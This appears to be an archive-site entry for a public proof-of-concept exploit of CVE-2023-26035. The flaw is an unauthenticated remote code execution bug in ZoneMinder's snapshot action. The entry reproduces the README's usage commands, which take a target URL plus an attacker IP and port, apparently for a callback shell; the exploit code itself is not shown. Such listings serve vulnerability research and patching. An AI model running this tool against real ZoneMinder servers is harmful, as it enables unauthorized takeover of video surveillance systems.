CVE-2023-26035 PoC — ZoneMinder 安全漏洞

Source

https://github.com/rvizx/CVE-2023-26035

Associated Vulnerability

Title:ZoneMinder 安全漏洞 (CVE-2023-26035)
Description:ZoneMinder是一套开源的视频监控软件系统。该系统支持IP、USB和模拟摄像机等。 ZoneMinder 1.36.33之前版本和1.37.33之前版本存在安全漏洞，该漏洞源于存在通过缺失授权进行未经认证的远程代码执行的漏洞。

Description

Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit

Readme

# CVE-2023-26035
Unauthenticated RCE in ZoneMinder Snapshots - PoC Exploit

![alt img](https://rvizx.github.io/CVE-2023-26035.png?raw=true)

### Description
ZoneMinder versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution due to missing authorization checks in the snapshot action. 

### Usage

```
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
```

```
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
```

#### Requirements

```
pip3 install beautifulsoup4
```

### Credits
[UnblvR](https://twitter.com/Unblvr1) discovered the vulnerability.

File Snapshot


 [4.0K]  /data/pocs/db8d4c92ade9f6bcdd7171de70d7baa2c2814bd3
├── [2.0K]  exploit.py
└── [ 640]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!